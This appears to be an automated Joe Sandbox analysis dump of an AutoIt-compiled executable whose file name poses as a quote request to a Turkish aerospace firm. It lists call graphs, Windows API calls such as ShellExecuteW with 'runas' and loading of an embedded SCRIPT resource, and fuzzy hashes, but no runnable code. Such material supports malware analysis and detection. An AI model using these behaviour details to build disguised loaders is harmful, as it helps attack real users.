98918->98921 98945 182b83 7 API calls 98919->98945 98923 1c2bb8 98921->98923 98925 189cb3 22 API calls 98923->98925 98927 1c2bc6 98925->98927 98926 182b2f 98931 182b44 98926->98931 98949 183837 49 API calls ___scrt_fastfail 98926->98949 98928 1c2bce 98927->98928 98929 1c2bf5 98927->98929 98933 1833c6 22 API calls 98928->98933 98932 1833c6 22 API calls 98929->98932 98936 182b5f 98931->98936 98950 1830f2 Shell_NotifyIconW ___scrt_fastfail 98931->98950 98934 1c2bf1 GetForegroundWindow ShellExecuteW 98932->98934 98935 1c2bd9 98933->98935 98940 1c2c26 98934->98940 98938 186350 22 API calls 98935->98938 98943 182b66 SetCurrentDirectoryW 98936->98943 98941 1c2be7 98938->98941 98940->98936 98942 1833c6 22 API calls 98941->98942 98942->98934 98944 182b7a 98943->98944 98951 182cd4 7 API calls 98945->98951 98947 182b2a 98948 182c63 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 98947->98948 98948->98926 98949->98931 98950->98936 98951->98947 98952 182de3 98953 182df0 __wsopen_s 98952->98953 98954 182e09 98953->98954 98955 1c2c2b ___scrt_fastfail 98953->98955 98956 183aa2 23 API calls 98954->98956 98957 1c2c47 GetOpenFileNameW 98955->98957 98958 182e12 98956->98958 98959 1c2c96 98957->98959 98968 182da5 98958->98968 98961 186b57 22 API calls 98959->98961 98963 1c2cab 98961->98963 98963->98963 98965 182e27 98986 1844a8 98965->98986 98969 1c1f50 __wsopen_s 98968->98969 98970 182db2 GetLongPathNameW 98969->98970 98971 186b57 22 API calls 98970->98971 98972 182dda 98971->98972 98973 183598 98972->98973 98974 18a961 22 API calls 98973->98974 98975 1835aa 98974->98975 98976 183aa2 23 API calls 98975->98976 98977 1835b5 98976->98977 98978 1c32eb 98977->98978 98979 1835c0 98977->98979 98983 1c330d 98978->98983 99022 19ce60 41 API calls 98978->99022 98981 18515f 22 API calls 98979->98981 98982 1835cc 98981->98982 99016 1835f3 98982->99016 98985 1835df 98985->98965 98987 184ecb 94 API calls 98986->98987 98988 1844cd 98987->98988 98989 1c3833 98988->98989 98990 184ecb 94 API calls 98988->98990 98991 1f2cf9 80 API calls 98989->98991 98992 1844e1 98990->98992 98993 1c3848 98991->98993 98992->98989 98996 1844e9 98992->98996 98994 1c384c 98993->98994 98995 1c3869 98993->98995 98997 184f39 68 API calls 98994->98997 98998 19fe0b 22 API calls 98995->98998 98999 1c3854 98996->98999 99000 1844f5 98996->99000 98997->98999 99015 1c38ae 98998->99015 99030 1eda5a 82 API calls 98999->99030 99029 18940c 136 API calls 2 library calls 99000->99029 99003 1c3862 99003->98995 99004 182e31 99005 1c3a5f 99010 1c3a67 99005->99010 99006 184f39 68 API calls 99006->99010 99007 18a4a1 22 API calls 99007->99015 99010->99006 99034 1e989b 82 API calls __wsopen_s 99010->99034 99012 189cb3 22 API calls 99012->99015 99015->99005 99015->99007 99015->99010 99015->99012 99023 183ff7 99015->99023 99031 1e967e 22 API calls __fread_nolock 99015->99031 99032 1e95ad 42 API calls _wcslen 99015->99032 99033 1f0b5a 22 API calls 99015->99033 99017 183605 99016->99017 99021 183624 __fread_nolock 99016->99021 99019 19fe0b 22 API calls 99017->99019 99018 19fddb 22 API calls 99020 18363b 99018->99020 99019->99021 99020->98985 99021->99018 99022->98978 99024 18400a 99023->99024 99028 1840ae 99023->99028 99025 19fe0b 22 API calls 99024->99025 99027 18403c 99024->99027 99025->99027 99026 19fddb 22 API calls 99026->99027 99027->99026 99027->99028 99028->99015 99029->99004 99030->99003 99031->99015 99032->99015 99033->99015 99034->99010 99035 1d3a41 99039 1f10c0 99035->99039 99037 1d3a4c 99038 1f10c0 53 API calls 99037->99038 99038->99037 99045 1f10fa 99039->99045 99046 1f10cd 99039->99046 99040 1f10fc 99051 19fa11 53 API calls 99040->99051 99042 1f1101 99043 187510 53 API calls 99042->99043 99044 1f1108 99043->99044 99047 186350 22 API calls 99044->99047 99045->99037 99046->99040 99046->99042 99046->99045 99048 1f10f4 99046->99048 99047->99045 99050 18b270 39 API calls 99048->99050 99050->99045 99051->99042 99052 181044 99057 1810f3 99052->99057 99054 18104a 99093 1a00a3 29 API calls __onexit 99054->99093 99056 181054 99094 181398 99057->99094 99061 18116a 99062 18a961 22 API calls 99061->99062 99063 181174 99062->99063 99064 18a961 22 API calls 99063->99064 99065 18117e 99064->99065 99066 18a961 22 API calls 99065->99066 99067 181188 99066->99067 99068 18a961 22 API calls 99067->99068 99069 1811c6 99068->99069 99070 18a961 22 API calls 99069->99070 99071 181292 99070->99071 99104 18171c 99071->99104 99075 1812c4 99076 18a961 22 API calls 99075->99076 99077 1812ce 99076->99077 99078 191940 9 API calls 99077->99078 99079 1812f9 99078->99079 99125 181aab 99079->99125 99081 181315 99082 181325 GetStdHandle 99081->99082 99083 18137a 99082->99083 99084 1c2485 99082->99084 99087 181387 OleInitialize 99083->99087 99084->99083 99085 1c248e 99084->99085 99086 19fddb 22 API calls 99085->99086 99088 1c2495 99086->99088 99087->99054 99132 1f011d InitializeCriticalSectionAndSpinCount InterlockedExchange GetCurrentProcess GetCurrentProcess DuplicateHandle 99088->99132 99090 1c249e 99133 1f0944 CreateThread 99090->99133 99092 1c24aa CloseHandle 99092->99083 99093->99056 99134 1813f1 99094->99134 99097 1813f1 22 API calls 99098 1813d0 99097->99098 99099 18a961 22 API calls 99098->99099 99100 1813dc 99099->99100 99101 186b57 22 API calls 99100->99101 99102 181129 99101->99102 99103 181bc3 6 API calls 99102->99103 99103->99061 99105 18a961 22 API calls 99104->99105 99106 18172c 99105->99106 99107 18a961 22 API calls 99106->99107 99108 181734 99107->99108 99109 18a961 22 API calls 99108->99109 99110 18174f 99109->99110 99111 19fddb 22 API calls 99110->99111 99112 18129c 99111->99112 99113 181b4a 99112->99113 99114 181b58 99113->99114 99115 18a961 22 API calls 99114->99115 99116 181b63 99115->99116 99117 18a961 22 API calls 99116->99117 99118 181b6e 99117->99118 99119 18a961 22 API calls 99118->99119 99120 181b79 99119->99120 99121 18a961 22 API calls 99120->99121 99122 181b84 99121->99122 99123 19fddb 22 API calls 99122->99123 99124 181b96 RegisterWindowMessageW 99123->99124 99124->99075 99126 1c272d 99125->99126 99127 181abb 99125->99127 99141 1f3209 23 API calls 99126->99141 99129 19fddb 22 API calls 99127->99129 99131 181ac3 99129->99131 99130 1c2738 99131->99081 99132->99090 99133->99092 99142 1f092a 28 API calls 99133->99142 99135 18a961 22 API calls 99134->99135 99136 1813fc 99135->99136 99137 18a961 22 API calls 99136->99137 99138 181404 99137->99138 99139 18a961 22 API calls 99138->99139 99140 1813c6 99139->99140 99140->99097 99141->99130 99143 1d2a00 99157 18d7b0 ISource 99143->99157 99144 18db11 PeekMessageW 99144->99157 99145 18d807 GetInputState 99145->99144 99145->99157 99146 1d1cbe TranslateAcceleratorW 99146->99157 99148 18db8f PeekMessageW 99148->99157 99149 18db73 TranslateMessage DispatchMessageW 99149->99148 99150 18da04 timeGetTime 99150->99157 99151 18dbaf Sleep 99169 18dbc0 99151->99169 99152 1d2b74 Sleep 99152->99169 99153 19e551 timeGetTime 99153->99169 99154 1d1dda timeGetTime 99204 19e300 23 API calls 99154->99204 99157->99144 99157->99145 99157->99146 99157->99148 99157->99149 99157->99150 99157->99151 99157->99152 99157->99154 99160 18d9d5 99157->99160 99171 18ec40 235 API calls 99157->99171 99172 191310 235 API calls 99157->99172 99173 18bf40 235 API calls 99157->99173 99175 18dfd0 99157->99175 99198 19edf6 99157->99198 99203 18dd50 235 API calls 99157->99203 99205 1f3a2a 23 API calls 99157->99205 99206 1f359c 82 API calls __wsopen_s 99157->99206 99158 1d2c0b GetExitCodeProcess 99161 1d2c37 CloseHandle 99158->99161 99162 1d2c21 WaitForSingleObject 99158->99162 99161->99169 99162->99157 99162->99161 99163 1d2a31 99163->99160 99164 2129bf GetForegroundWindow 99164->99169 99165 1d2ca9 Sleep 99165->99157 99169->99153 99169->99157 99169->99158 99169->99160 99169->99163 99169->99164 99169->99165 99207 205658 23 API calls 99169->99207 99208 1ee97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 99169->99208 99209 1ed4dc 47 API calls 99169->99209 99171->99157 99172->99157 99173->99157 99176 18e010 99175->99176 99191 18e0dc ISource 99176->99191 99212 1a0242 5 API calls __Init_thread_wait 99176->99212 99179 1d2fca 99181 18a961 22 API calls 99179->99181 99179->99191 99180 18a961 22 API calls 99180->99191 99183 1d2fe4 99181->99183 99213 1a00a3 29 API calls __onexit 99183->99213 99186 1d2fee 99214 1a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99186->99214 99190 18a8c7 22 API calls 99190->99191 99191->99180 99191->99190 99192 1904f0 22 API calls 99191->99192 99193 1f359c 82 API calls 99191->99193 99194 18ec40 235 API calls 99191->99194 99195 18e3e1 99191->99195 99210 18a81b 41 API calls 99191->99210 99211 19a308 235 API calls 99191->99211 99215 1a0242 5 API calls __Init_thread_wait 99191->99215 99216 1a00a3 29 API calls __onexit 99191->99216 99217 1a01f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 99191->99217 99218 2047d4 235 API calls 99191->99218 99219 2068c1 235 API calls 99191->99219 99192->99191 99193->99191 99194->99191 99195->99157 99199 19ee09 99198->99199 99200 19ee12 99198->99200 99199->99157 99200->99199 99201 19ee36 IsDialogMessageW 99200->99201 99202 1defaf GetClassLongW 99200->99202 99201->99199 99201->99200 99202->99200 99202->99201 99203->99157 99204->99157 99205->99157 99206->99157 99207->99169 99208->99169 99209->99169 99210->99191 99211->99191 99212->99179 99213->99186 99214->99191 99215->99191 99216->99191 99217->99191 99218->99191 99219->99191

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 234 1842de-18434d call 18a961 GetVersionExW call 186b57 239 1c3617-1c362a 234->239 240 184353 234->240 242 1c362b-1c362f 239->242 241 184355-184357 240->241 243 18435d-1843bc call 1893b2 call 1837a0 241->243 244 1c3656 241->244 245 1c3631 242->245 246 1c3632-1c363e 242->246 263 1c37df-1c37e6 243->263 264 1843c2-1843c4 243->264 250 1c365d-1c3660 244->250 245->246 246->242 247 1c3640-1c3642 246->247 247->241 249 1c3648-1c364f 247->249 249->239 252 1c3651 249->252 253 18441b-184435 GetCurrentProcess IsWow64Process 250->253 254 1c3666-1c36a8 250->254 252->244 256 184494-18449a 253->256 257 184437 253->257 254->253 258 1c36ae-1c36b1 254->258 260 18443d-184449 256->260 257->260 261 1c36db-1c36e5 258->261 262 1c36b3-1c36bd 258->262 265 18444f-18445e LoadLibraryA 260->265 266 1c3824-1c3828 GetSystemInfo 260->266 270 1c36f8-1c3702 261->270 271 1c36e7-1c36f3 261->271 267 1c36bf-1c36c5 262->267 268 1c36ca-1c36d6 262->268 272 1c37e8 263->272 273 1c3806-1c3809 263->273 264->250 269 1843ca-1843dd 264->269 278 18449c-1844a6 GetSystemInfo 265->278 279 184460-18446e GetProcAddress 265->279 267->253 268->253 280 1c3726-1c372f 269->280 281 1843e3-1843e5 269->281 274 1c3704-1c3710 270->274 275 1c3715-1c3721 270->275 271->253 282 1c37ee 272->282 276 1c380b-1c381a 273->276 277 1c37f4-1c37fc 273->277 274->253 275->253 276->282 285 1c381c-1c3822 276->285 277->273 287 184476-184478 278->287 279->278 286 184470-184474 GetNativeSystemInfo 279->286 283 1c373c-1c3748 280->283 284 1c3731-1c3737 280->284 288 1c374d-1c3762 281->288 289 1843eb-1843ee 281->289 282->277 283->253 284->253 285->277 286->287 294 18447a-18447b FreeLibrary 287->294 295 184481-184493 287->295 292 1c376f-1c377b 288->292 293 1c3764-1c376a 288->293 290 1843f4-18440f 289->290 291 1c3791-1c3794 289->291 296 1c3780-1c378c 290->296 297 184415 290->297 291->253 298 1c379a-1c37c1 291->298 292->253 293->253 294->295 296->253 297->253 299 1c37ce-1c37da 298->299 300 1c37c3-1c37c9 298->300 299->253 300->253
                                                                                                                                    APIs
                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 0018430D
                                                                                                                                      • Part of subcall function 00186B57: _wcslen.LIBCMT ref: 00186B6A
                                                                                                                                    • GetCurrentProcess.KERNEL32(?,0021CB64,00000000,?,?), ref: 00184422
                                                                                                                                    • IsWow64Process.KERNEL32(00000000,?,?), ref: 00184429
                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00184454
                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00184466
                                                                                                                                    • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00184474
                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,?), ref: 0018447B
                                                                                                                                    • GetSystemInfo.KERNEL32(?,?,?), ref: 001844A0
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                    • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                    • API String ID: 3290436268-3101561225
                                                                                                                                    • Opcode ID: d5087a8a4c9cb2e45eb9bed39b902c0c0a26aa78f26ba23034e727317116e5fd
                                                                                                                                    • Instruction ID: 842f7960bcbaa43022de5312ad46ddf0f315e9f17a62a8357f920ba864153e4d
                                                                                                                                    • Opcode Fuzzy Hash: d5087a8a4c9cb2e45eb9bed39b902c0c0a26aa78f26ba23034e727317116e5fd
                                                                                                                                    • Instruction Fuzzy Hash: 2DA1D27590A3C0FFC715DB68B86C7947FA46F36346B1888DCE04193A61D7304AA8CB29

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 1171 1842a2-1842ba CreateStreamOnHGlobal 1172 1842da-1842dd 1171->1172 1173 1842bc-1842d3 FindResourceExW 1171->1173 1174 1842d9 1173->1174 1175 1c35ba-1c35c9 LoadResource 1173->1175 1174->1172 1175->1174 1176 1c35cf-1c35dd SizeofResource 1175->1176 1176->1174 1177 1c35e3-1c35ee LockResource 1176->1177 1177->1174 1178 1c35f4-1c3612 1177->1178 1178->1174
                                                                                                                                    APIs
                                                                                                                                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,001850AA,?,?,00000000,00000000), ref: 001842B2
                                                                                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,001850AA,?,?,00000000,00000000), ref: 001842C9
                                                                                                                                    • LoadResource.KERNEL32(?,00000000,?,?,001850AA,?,?,00000000,00000000,?,?,?,?,?,?,00184F20), ref: 001C35BE
                                                                                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,001850AA,?,?,00000000,00000000,?,?,?,?,?,?,00184F20), ref: 001C35D3
                                                                                                                                    • LockResource.KERNEL32(001850AA,?,?,001850AA,?,?,00000000,00000000,?,?,?,?,?,?,00184F20,?), ref: 001C35E6
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                                                                    • String ID: SCRIPT
                                                                                                                                    • API String ID: 3051347437-3967369404
                                                                                                                                    • Opcode ID: 20d6247b649cf9b68522475206e128cd7d2ce2a04fd542353175e6012504f2d5
                                                                                                                                    • Instruction ID: cbdf4a9d694f870eaae41d7c27f59d59e11a4546672097955519ee7bbadcb429
                                                                                                                                    • Opcode Fuzzy Hash: 20d6247b649cf9b68522475206e128cd7d2ce2a04fd542353175e6012504f2d5
                                                                                                                                    • Instruction Fuzzy Hash: 7211AC78240305BFD7219B65EC48FA77BBAEBD9B55F208169B802C6250DF71D9008A20

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00182B6B
                                                                                                                                      • Part of subcall function 00183A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00251418,?,00182E7F,?,?,?,00000000), ref: 00183A78
                                                                                                                                      • Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD
                                                                                                                                    • GetForegroundWindow.USER32(runas,?,?,?,?,?,00242224), ref: 001C2C10
                                                                                                                                    • ShellExecuteW.SHELL32(00000000,?,?,00242224), ref: 001C2C17
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                                                                                                    • String ID: runas
                                                                                                                                    • API String ID: 448630720-4000483414
                                                                                                                                    • Opcode ID: cbb3cb30c4540e2773f8996cc307d45e3719e74129ad08b65227699000803322
                                                                                                                                    • Instruction ID: a8984c2846ba20213619a9366baaee7d85276a9cd09d6a9af04c07206ef3d4eb
                                                                                                                                    • Opcode Fuzzy Hash: cbb3cb30c4540e2773f8996cc307d45e3719e74129ad08b65227699000803322
                                                                                                                                    • Instruction Fuzzy Hash: 4D11D331208305AAC719FF60E855EBEB7A4ABB2741F48142DF492570A2CF318B5A8F12
                                                                                                                                    APIs
                                                                                                                                    • lstrlenW.KERNEL32(?,001C5222), ref: 001EDBCE
                                                                                                                                    • GetFileAttributesW.KERNELBASE(?), ref: 001EDBDD
                                                                                                                                    • FindFirstFileW.KERNELBASE(?,?), ref: 001EDBEE
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 001EDBFA
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2695905019-0
                                                                                                                                    • Opcode ID: cc813d0a7ab1d1056f05e282e7600dc233b8795dc9d63d18d1518b221ff7732c
                                                                                                                                    • Instruction ID: a48cfffe09c6ac8cb128ad7968c5b99a0a5bd859055e59c487e7354b1bcceabe
                                                                                                                                    • Opcode Fuzzy Hash: cc813d0a7ab1d1056f05e282e7600dc233b8795dc9d63d18d1518b221ff7732c
                                                                                                                                    • Instruction Fuzzy Hash: D4F0A9308909106782206B7CBC0D8AE37AC9E02374B30870AF836C20E0EFB099A48696
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharUpper
                                                                                                                                    • String ID: p#%
                                                                                                                                    • API String ID: 3964851224-1578963556
                                                                                                                                    • Opcode ID: cb774f125fe0c331c95f811b49160543b53d701e8c39530d11ec4d13b95c10e6
                                                                                                                                    • Instruction ID: 7a6e78ce650ce530eeba99effd4406ed08895f3a0098db782e298caeea093667
                                                                                                                                    • Opcode Fuzzy Hash: cb774f125fe0c331c95f811b49160543b53d701e8c39530d11ec4d13b95c10e6
                                                                                                                                    • Instruction Fuzzy Hash: 3BA25B70A083019FD715DF28C480B2AB7E1BF99304F15896EE99A8B352D771ED45CFA2
                                                                                                                                    APIs
                                                                                                                                    • GetInputState.USER32 ref: 0018D807
                                                                                                                                    • timeGetTime.WINMM ref: 0018DA07
                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0018DB28
                                                                                                                                    • TranslateMessage.USER32(?), ref: 0018DB7B
                                                                                                                                    • DispatchMessageW.USER32(?), ref: 0018DB89
                                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0018DB9F
                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 0018DBB1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2189390790-0
                                                                                                                                    • Opcode ID: 35c5b4baed98b52dd2aaaf648aa3d0c7890722f5bf693e994334a46d846663bf
                                                                                                                                    • Instruction ID: 56247fedbfc85db46c83edb8cee9096fe04314826973270550e1893690d7858f
                                                                                                                                    • Opcode Fuzzy Hash: 35c5b4baed98b52dd2aaaf648aa3d0c7890722f5bf693e994334a46d846663bf
                                                                                                                                    • Instruction Fuzzy Hash: 6842CF30608341EFD728EF24E888BAAB7E1BF66314F55855AE465873D1D770EA44CF82

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00182D07
                                                                                                                                    • RegisterClassExW.USER32(00000030), ref: 00182D31
                                                                                                                                    • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00182D42
                                                                                                                                    • InitCommonControlsEx.COMCTL32(?), ref: 00182D5F
                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00182D6F
                                                                                                                                    • LoadIconW.USER32(000000A9), ref: 00182D85
                                                                                                                                    • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00182D94
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                    • API String ID: 2914291525-1005189915
                                                                                                                                    • Opcode ID: 7904067e0a3f43d88552629b8b0afc15ff1451d5b791eb458ed9ac80d4d683c9
                                                                                                                                    • Instruction ID: 7d928273823ff12d29665c6daeff736462339eedf7fa093bb2999fe7d632886d
                                                                                                                                    • Opcode Fuzzy Hash: 7904067e0a3f43d88552629b8b0afc15ff1451d5b791eb458ed9ac80d4d683c9
                                                                                                                                    • Instruction Fuzzy Hash: 1421C3B9991318AFDB00DFA4F84DBEDBBB8FB18701F10811AF511A62A0DBB14554CF95

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
